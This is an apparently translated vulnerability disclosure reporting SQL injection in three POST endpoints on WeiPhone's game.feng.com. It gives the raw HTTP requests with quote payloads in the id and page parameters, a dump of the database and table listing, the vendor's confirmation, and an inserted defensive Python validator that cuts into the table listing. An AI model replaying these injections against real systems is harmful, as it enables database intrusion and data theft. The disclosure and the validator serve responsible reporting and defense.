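2015-02-04: Details reported to the vendor; awaiting vendor handling
2015-02-04: Vendor confirmed; details disclosed to the vendor only
2015-02-14: Details disclosed to core white hats and experts in related fields
2015-02-24: Details disclosed to regular white hats
2015-03-06: Details disclosed to trainee white hats
2015-03-21: Details disclosed to the public

Multiple injection points on a WeiPhone (威锋网) site (root privileges, all databases can be dumped). Can I get 20?

First injection point: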
POST /game/read/getDownloadButton.shtml HTTP/1.1
Host: game.feng.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: CNZZDATA30093478=cnzz_eid%3D560578924-1423008837-http%253A%252F%252Fwww.wooyun.org%252F%26ntime%3D1423014237; PHPSESSID=auelk29lhhgjdosu4ren2o3iq5; NSC_hbnf.gfoh.dpn=ffffffffc3a0d33a45525d5f4f58455e445a4a423660
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4

id=1
Parameter: id

Second injection point:
POST /game/read/getAppCommentList.shtml HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://game.feng.com
Referer: http://game.feng.com/game/read/index-id-1438770.shtml
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: game.feng.com
Cookie: PHPSESSID=j2mh6gqd74v4jpvmtkn2rg8ho6; NSC_hbnf.gfoh.dpn=ffffffffc3a0d33a45525d5f4f58455e445a4a423660
Accept-Encoding: gzip, deflate
Content-Length: 28
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

page=%2527&entity_id=1438770
Parameter: page=

Third injection point:
POST /game/read/manageComment.shtml HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://game.feng.com
Referer: http://game.feng.com/game/read/index-id-1445798.shtml
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: game.feng.com
Cookie: PHPSESSID=j2mh6gqd74v4jpvmtkn2rg8ho6; NSC_hbnf.gfoh.dpn=ffffffffc3a0d33a45525d5f4f58455e445a4a423660
Accept-Encoding: gzip, deflate
Content-Length: 40
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

id=%2527&motion=oppose&entity_id=1445798
Parameter: id=

A few screenshots:
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] we+
[*] weapodspace

Database: weapodspace
[11 tables]
+-------------------------+
| system_cache            |
| system_cache_group      |
| system_function         |
| system_module           |
| system_right            |
| system_right_url        |
| system_role             |
| system_role_right       |
| system_user_role        |
| weiphone_app_*_info     |
| weiphone_app_*_info_1   |
+-------------------------+

Database: we+
[271 tables]
+----------------------------------------+
| we_user_expert(delete)                 |
| account_record                         |
| admin_log                              |
| admin_message                          |
| admin_user                             |
| android_market_file_info               |
| app_advertisement                      |
| app_and_article_relations              |
| app_android_entity                     |
| app_android_entity_datetime            |
| app_android_entity_decimal             |
| app_android_entity_int                 |
| app_android_entity_text                |
| app_android_entity_varchar             |
| app_android_flat                       |
| app_android_flat_exten                 |
| app_article
It looks like some keywords are being filtered. Do I need to dig deeper?
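From the defender's side, the three request bodies above can be rejected by type rather than by keyword. The following is an added example, not code from the report or from the vendor: it parses each body, peels nested percent-encoding such as %2527, and flags any value that is not a plain decimal integer. It assumes that id, page and entity_id are meant to be integers, inferred from the benign values in the requests.

```python
from urllib.parse import parse_qsl, unquote

# Assumption: these parameters are numeric identifiers/counters, inferred from
# the benign values in the requests (id=1, entity_id=1438770).
INT_PARAMS = {"id", "page", "entity_id"}
MAX_DECODE_ROUNDS = 5  # bound the loop so crafted input cannot spin it


def fully_decode(value):
    """Percent-decode until the value stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < MAX_DECODE_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def check_body(raw_body):
    """Return a list of (param, reason) findings for one form-encoded body."""
    findings = []
    # parse_qsl performs the first decode, as the web framework would.
    for name, value in parse_qsl(raw_body, keep_blank_values=True):
        final, extra_rounds = fully_decode(value)
        if extra_rounds:
            findings.append((name, f"nested encoding, decodes to {final!r}"))
        # Type check on the once-decoded value the application would receive.
        if name in INT_PARAMS and not (value.isascii() and value.isdigit()):
            findings.append((name, "not a decimal integer"))
    return findings


# Request bodies copied from the three requests in the report.
BODIES = {
    "getDownloadButton": "id=1",
    "getAppCommentList": "page=%2527&entity_id=1438770",
    "manageComment": "id=%2527&motion=oppose&entity_id=1445798",
}

if __name__ == "__main__":
    for endpoint, body in BODIES.items():
        for param, reason in check_body(body) or [("-", "clean")]:
            print(f"{endpoint}: {param}: {reason}")
```

A check like this belongs in front of the query layer as a second line of defense; the query itself should still bind these values as parameters instead of concatenating them into SQL.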
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-02-04 16:01
Thanks for the heads-up. We will fix it as soon as possible. You get 20 points.